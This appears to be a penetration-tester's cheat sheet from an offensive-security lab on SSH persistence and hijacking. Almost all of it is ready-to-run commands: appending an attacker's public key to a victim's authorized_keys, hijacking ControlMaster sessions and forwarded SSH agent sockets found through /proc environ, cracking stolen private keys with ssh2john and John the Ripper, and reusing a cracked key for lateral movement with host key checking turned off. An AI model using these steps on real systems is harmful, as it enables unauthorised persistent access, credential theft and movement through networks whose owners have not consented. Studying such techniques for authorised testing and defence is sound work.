SSH

SSH Persistence and Hijacking

Peristence

if writable on victim

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys

ssh-copy-id "user@hostname.example.com -p <port-number>"

cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys

Now you can SSH without a passphrase

ssh kali@linuxvictim

SSH Agent-Forwarding

Looking for socket files

• Use existing connection to get to another machine

• modification of ~/.ssh/config

• any new connections will try to use an existing control socket

• need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config && mkdir ~/.ssh/controlmaster

• Create keys

ssh-keygen

• public keys need to be copied to the other boxes if possible

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller  
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

• Must modify local .ssh/config file to enable forward agent

echo "ForwardAgent yes" >> .ssh/config

• The intermediate server / controller must have AllowAgentForwarding in sshd config enabled

grep AllowAgentForwarding /etc/ssh/sshd_config

• must enable the ssh agent on our Kali box

eval 'ssh-agent'

• now we must add our keys to the ssh agent

ssh-add

• ssh into the controller as offsec, then ssh into the linuxvictim as offsec and exit the linux victim session

Controlmaster config

Host *  
ControlPath ~/.ssh/controlmaster/%r@%h:%p  
ControlMaster auto  
ControlPersist 10m
ForwardAgent yes

• need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config  
mkdir ~/.ssh/controlmaster

• if there happens to be a session it can be seen in the controlmaster folder created

ls -al ~/.ssh/controlmaster/

• If there is an entry you can ssh to that box by specifying ssh -S

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

Enumeration of sockets

• Looking for the "SSH_AUTH_SOCK entry"

ps -aux | grep ssh

pstree -p offsec | grep ssh\

cat /proc/[pid]/environ

Look for the last line "SSH_AUTH_SOCK"

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380

ssh-add -l

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380

ssh offsec@linuxvictim

Cracking SSH Keys

Copy SSH key to Kali

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

gunzip /usr/share/wordlists/rockyou.gz (if not already done)

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Use cracked key to laterally move

ssh -i ./svuser.key -o StrictHostKeyChecking=no svuser@controller